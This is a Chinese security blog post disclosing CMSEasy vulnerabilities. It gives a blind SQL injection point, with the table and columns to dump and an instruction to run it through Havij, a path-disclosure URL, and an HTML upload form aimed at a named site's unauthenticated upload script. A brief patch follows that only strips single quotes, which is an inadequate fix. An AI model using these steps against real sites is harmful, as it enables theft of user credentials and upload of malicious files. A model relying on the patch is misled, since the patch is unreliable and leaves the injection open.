cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY |

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

注入漏洞

注入点:/celive/js/include.php?cmseasylive=1111&departmentid=0
类型:mysql blind—string
错误关键字:online.gif
表名:cmseasy_user
列明:userid,username,password
直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,password 关键字:Powered by CmsEasy

 

暴路径 ODAY

直接把爆路径 如:http://www.8090sec.com/index.php?case=archive

上传漏洞

Exp:

<form enctype=”multipart/form-data” method=”post” action=”http://www.8090sec.com/celive/live/doajaxfileupload.php”>
<input type=”file” name=”fileToUpload”>
<input type=”submit” value=”上传”>
</form>

注入漏洞修复:

打开 /celive/js/include.php 文件,来到52行或此功能代码处

if (isset($_GET[‘departmentid’])) {
$departmentid = $_GET[‘departmentid’];
$activity_sql = “SELECT `id` FROM `”.$config[‘prefix’].”activity` WHERE `departmentid`='”.$departmentid.”‘ AND `operatorid`='”.$operatorid.”‘”;
将代码改为
if (isset($_GET[‘departmentid’])) {
$departmentid = str_replace(“‘”,””,$_GET[‘departmentid’]);
$activity_sql = “SELECT `id` FROM `”.$config[‘prefix’].”activity` WHERE `departmentid`='”.$departmentid.”‘ AND `operatorid`='”.$operatorid.”‘”;

Tags:

cmseasy漏洞, 易通CMS漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY |